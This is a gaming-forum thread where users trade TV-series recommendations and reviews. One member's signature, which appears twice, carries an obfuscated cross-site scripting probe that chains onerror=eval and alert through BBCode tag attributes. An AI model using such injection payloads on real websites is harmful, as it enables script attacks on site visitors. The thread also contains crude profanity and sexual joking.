Login to ZARP
Username: Password: Remember me
  • Page:

TOPIC: Series to watch

Series to watch 8 years 6 months ago #242235

Yo!
So I've been watching series like Narcos, Gotham,Game of Thrones, Walking dead, Vikings! I NEED MORE XD

Gimme suggestions about series

Info:
It must contain a bit action
NO ANIME! I know that a lot of people watch Anime in this community. Now I don't have anything against it, but I think anime really sucks.

THXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  • Bob Raheem
  • User is blocked
  • ZARP VIP
  • SSRP Admin # Sonzy is my bae
  • Thanks received: 62
Login or register to post a reply.

Series to watch 8 years 6 months ago #242236

The100
The strain
  • ParaMontana
  • User is blocked
  • ZARP VIP
  • Thanks received: 3172

Series to watch 8 years 6 months ago #242237

Better Call Saul.

Call LineLiar while you're at it.
  • Studio Banter
  • Marvelous Boarder
  • ZARP VIP
  • ❤️
  • Thanks received: 5848
Last Edit: 8 years 6 months ago by Studio Banter.

Series to watch 8 years 6 months ago #242238

Missfits
  • Barack Obama
  • Senior Boarder
  • ZARP VIP
  • Yoink
  • Thanks received: 41
Im just vibin

Series to watch 8 years 6 months ago #242240

Hearthstone_Cardsurlaw wrote:
Call LineLiar while you're at it.
We summon thy LineLiar!
  • Slapy47
  • Gold Boarder
  • ZARP VIP
  • EX- DarkRP Admin - TTT Moderator - Teamspeak Staff
  • Thanks received: 479

Series to watch 8 years 6 months ago #242243

Spartacus bit slow at the start but it's pretty blood thirsty it's like game of thrones
  • Kingpin
  • Expert Boarder
  • ZARP VIP
  • "All of them stars have a reason" R.I.P Gustav Åhr
  • Thanks received: 94

Series to watch 8 years 6 months ago #242247

Mr.robot about a guy that hacks bigger guys that do illegal sh*t and gets them arrested
Breaking bad: F*cking awsome
BLUE MOUNTAIN F*CKING STATE: This is the best show you wil ever see in your LIFE
  • Cardstarvipe
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 88

Ex-SSRP Admin
Ex-BhopModerator
Ex-TTT Moderator

Series to watch 8 years 6 months ago #242251

i dont watch much tv or any tv at all for that matter but on nexflix i found The I.T Crowd its a comedy and its this funniest thing EVER
  • Indiana Jones
  • Legendary Member
  • ZARP VIP Golden Blue Badge
  • aghaha yaaaaah
  • Thanks received: 4058

Series to watch 8 years 6 months ago #242252

Utopia

A conspiracy thriller that will have you on the edge of your seat till the last episode. Going from episode to episode challenging what is right, who is evil, who you can trust. It's gripping, strange and it's worth watching for the soundtrack alone. Sadly the third season was canceled so it ends pretty much on one of the largest cliff hangers (Next to farscape)
www.imdb.com/title/tt2384811/

Farscape

A sci-fi TV show that's not afraid to be funny. This entertaining series takes a while to get started but far outdoes any other Sci-Fi series out there. With complex and interesting characters, varied ideas, constantly changing environments and settings never allowing the show to become stale. Sadly the main series ends on the largest fucking cliff hanger ("To be continued")
www.imdb.com/title/tt0187636/

Dark Matter

This fairly new Sci-Fi series starts of with questions and always answers them with more questions. A group of strangers waking up on a ship with no memories is a great premise, add in some paranoia and an underlying plot involving betrayal, and you got a good series. The series may be young but it shows promise and I'm looking forward to the next season
www.imdb.com/title/tt4159076/

Star Trek

Seriously? It's fucking star trek. I ain't talking about the new shit. I'm talking about DS9, NG, and Enterprise. It's always great to watch. Deep lore, great stories, amazing characters and enough content to keep you going for far too long. (23 DAYS straight to finish all of it)

These are the BEST TV series I've ever watched
That beats star trek, Game of thrones, breaking bad.
They're all a bit slow going but fucking amazing
p.s. I'm bored and hungry
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...
Last Edit: 8 years 6 months ago by kristofferson.

Series to watch 8 years 6 months ago #242257

Battlestar galactica
  • Plankton
  • Gold Boarder
  • ZARP VIP
  • Overpowering Forehead
  • Thanks received: 567

Self proclaimed greatest of all time

Series to watch 8 years 6 months ago #242258

Limitless
  • AfroHat
  • Expert Boarder
  • ZARP VIP
  • Anime or Life?..... Anime.
  • Thanks received: 348

Series to watch 8 years 6 months ago #242271

blue mountain state.
  • Nexize
  • Legendary Member
  • ZARP VIP
  • I call myself Nexize but you can call me tonight
  • Thanks received: 1215
────────────────────────
My Animelist!
Steam!

Series to watch 8 years 6 months ago #242273

boku no pico
  • Sophia
  • Diamond Boarder
  • ZARP VIP
  • I'll always be the last one standing
  • Thanks received: 775

if a person who plays the piano is called a pianist why isn't a racer called a racist?

Weeaboos, Otakus and Anime are the side effects of nuclear radiaton

The following user(s) said Thank You: Slapy47

Series to watch 8 years 6 months ago #242277

DeathRazor213 wrote:
boku no pico
No
Warning: Spoiler! [ Click to expand ]
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

Series to watch 8 years 6 months ago #242298

*pops up out of nowhere*

My TV show powers have been summoned..... have ''a couple'' of TV shows.

Orphan Black

I just watched the trailer (after watching the 3 seasons) and it's pretty weird, but I think it gives a fine idea of what the show is. The show stars Tatiana Maslany as Sarah. And Allison. And Cosima. And Beth. And Rachel. Need I go on? The actress plays every person that looks like her, saying it without giving too much away. She was Emmy nominated this year for this role and got robbed by Viola Davis. The show has a great story, great characters and the acting is pico bello. Whenever a person comes to me asking what show they should watch, this will be the first TV show I suggest them. It's top notch.

Jessica Jones

An adaption of a marvel comic series. Much like Daredevil, Netflix adapts another great property and turns it into an even better TV show than they did the second time. Jessica Jones beats Daredevil in every regard. The story and characters are absolutely amazing. You will be sitting on the edge of your seat throughout the entirety of this show. Not watching this or Orphan Black should be considered as illegal. The acting is top notch, the characters are amazing (with an even greater villain! FUN FACT: The villain is played by David Tennant who played Dr. Who for a couple of seasons) and the atmosphere of this show is dark but perfect. If this doesn't get a Season 2 I will cry.

Once Upon a Time

What can I say. The trailer pretty much explains it all. The acting in good, the characters (since they are all derived from fairytales) are of course great, the CGI is pretty fucking great for a TV show and it's just a lot of fun. I'd say the writing jumps the shark from Season 3 and on, but if you are able to ignore some really stupid conveniences then you will definitely still entjoy the show as the seasons go on. Also, if you ever make it to the first half of 4A, it's shit and you might as well start season 4 with Episode 11 (it's basically the last episode of the arc from the first half of the season, but also introduces the second arc so it's must watch tbh if you're going to 4B immediately.) That's all I can say. The show is great fun and you should try it out.

Empire

Now, you should only really watch this if you're a fan of music and you're interested in the business side of things. It's a soap opera which means it will be overdramatic at some points, but it had a lot of charm which got me to binge-watch it in 1 day. Cookie is easily the best thing about the show and was also Emmy nominated for this role in the same year Tatiana was nominated (and Cookie aka Taraji P Henson was also robbed. God damnit Viola Davis.) Just, do yourself a favour and don't watch Season 2. It COMPLETELY jumps the shark and fucks the show up. But Season 1, that's a great piece of entertainment.

The Americans

This is a shorter alternative trailer but I think it does a better job at explaining what's going tbh. The Americans is a show about 2 Sovjet Union spies living in America trying to - basically - fuck over America by stealing technology etc. It's action packed, has great acting (FUN FACT: Margo Martindale, a guest actress who is called Claudia in the show, was nominated 3 times for Best Guest Actress in a Drama Serie for this role, and won the third time) and top notch writing. It's in the Cold War and extremely realistic, to the point where any of this could happen in real life. It's really top notch and a must-watch as well.

Arrow

Arrow is based on a DC comic property and is also a great show. I don't really have to explain anything considering the trailer pretty much does all that. The thing I personally have with Arrow though, is that I really need to watch it in blocks because if I'm binge watching it I do get bored very easily, but otherwise it really grasps you and you want to continue most times. I kinda stopped in Season 3 (it's currently airing Season 4) because the flashbacks became extremely boring in that season, but you'll have to decide for yourself if you even make it to that point. Otherwise, Season 1 and Season 2 (and definitely the second half of Season 2) are both amazing and you should really watch it if you want something very action oriented still with drama.

Grimm

As you can probably make out at this point, I love me some good fairy tale TV shows.. only this one isn't as much fairy tale as it is a procedural crime drama. Nonetheless, it still has a great lore and great story. I bingewatched all 4 seasons in a couple weeks and I regret nothing. It's a great show and I love it to bits. Now, a lot of people think the writing is extremely shit but I disagree and would say that the writing is actually fairly good and definitely not something that would ruin the entire show, so please give it a shot and see for yourself.

... and last but not least.

Survivor

Yeah, you probably didn't expect to find a ''reality show'' in here. Well, I myself can never stand reality shows and I hate them with a passion, but Survivor is not as much a reality show as it is a strategic game-show and I absolutely love it for that. Survivor is always intense every episode and just all the strategy that goes into it is mindblowing. The editing for a reality show is absolutely phenomenal and I myself have been ''blindsided'' (being extremely sure a certain person is/isn't going home and it turns out to be the opposite) many times because of it. It has 31 seasons and I know that is a big commitment, but - luckily - you don't have to watch them all in order. All can be watched perfectly out of order except for the returnee seasons, that's why I and most people that like Survivor will suggest you to start with Season 28 (Cagayan) if it sounds interesting and you would like to take a look.

Now I think you have enough TV shows to watch for a while. Feel free to summon me again once you are done with all of these.

*slowly fades away*
  • LineLiar
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 163

Series to watch 8 years 6 months ago #242299

Nexize wrote:
blue mountain state.
  • Cardstarvipe
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 88

Ex-SSRP Admin
Ex-BhopModerator
Ex-TTT Moderator

Series to watch 8 years 6 months ago #242302

American horror storie
Jessica jones
Agent carter
Daredevil
Z nation
The walking dead
Greys anatomy
Under the dome
Better call saul
Jericho
Defiance
Falling skies
The returned

theese are the ones i watch/watched
  • Decisive
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 82

Series to watch 8 years 6 months ago #242317

rayman1919 wrote:
Under the dome

One tip from his list. Do not watch Under the Dome. You will thank me later.
  • LineLiar
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 163

Series to watch 8 years 6 months ago #242320

• ScorpionOnAcid
  • Diamond Boarder
  • ZARP VIP
  • Thanks received: 452

"I asked God for a bike, but I know God doesn't work that way. So I stole a bike and asked for forgiveness."

Former DarkRP / TTT Moderator.

Series to watch 8 years 6 months ago #242335

Deutschland 83

It's in German but it's an amazing TV Series.
  • stratiic
  • User is blocked
  • ZARP VIP
  • spitting in your mum's twat
  • Thanks received: 1452
  • Page:
Time to create page: 0.187 seconds

258 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
9/127
Connect to server View Gametracker Deathrun